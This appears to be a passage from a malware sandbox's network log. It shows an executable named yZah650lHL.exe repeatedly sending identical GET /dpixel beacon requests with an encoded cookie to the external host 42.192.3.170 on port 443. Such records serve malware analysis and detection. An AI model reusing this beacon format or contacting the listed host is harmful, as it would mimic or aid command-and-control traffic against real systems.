                  2025-01-03 01:54:07 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:08 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:08 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  68192.168.2.45007142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:09 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:10 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:10 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  69192.168.2.45007242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:11 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:12 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:12 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  70192.168.2.45007342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:13 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:14 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:14 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  71192.168.2.45007442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:15 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:16 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:16 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  72192.168.2.45007542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:18 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:18 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:18 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  73192.168.2.45007642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:20 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:20 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:20 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  74192.168.2.45007742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:21 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:22 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:22 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  75192.168.2.45007842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:23 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:24 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:24 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  76192.168.2.45007942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:25 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:26 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:26 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  77192.168.2.45008042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:27 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:28 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:28 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  78192.168.2.45008142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:29 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:30 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:30 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  79192.168.2.45008242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:31 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:32 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:32 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  80192.168.2.45008342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:33 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:34 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  81192.168.2.45008442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:35 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:36 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:36 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  82192.168.2.45008542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:37 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:38 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:38 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  83192.168.2.45008642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:39 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:40 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:39 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  84192.168.2.45008742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:41 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:41 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:41 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  85192.168.2.45008842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:43 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:43 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:43 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  86192.168.2.45008942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:45 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:45 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:45 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  87192.168.2.45009042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:47 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:48 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:47 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  88192.168.2.45009142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:49 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:49 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:49 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  89192.168.2.45009242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:51 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:51 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:51 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  90192.168.2.45009342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:53 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:53 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:53 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  91192.168.2.45009442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:55 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:55 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:55 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  92192.168.2.45009542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:57 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:57 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:57 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  93192.168.2.45009642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:54:59 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:54:59 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:54:59 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  94192.168.2.45009742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:01 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:01 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:01 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  95192.168.2.45009842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:03 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:03 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:03 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  96192.168.2.45009942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:04 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:05 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:05 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination Port
                  97192.168.2.45010042.192.3.170443
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:06 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
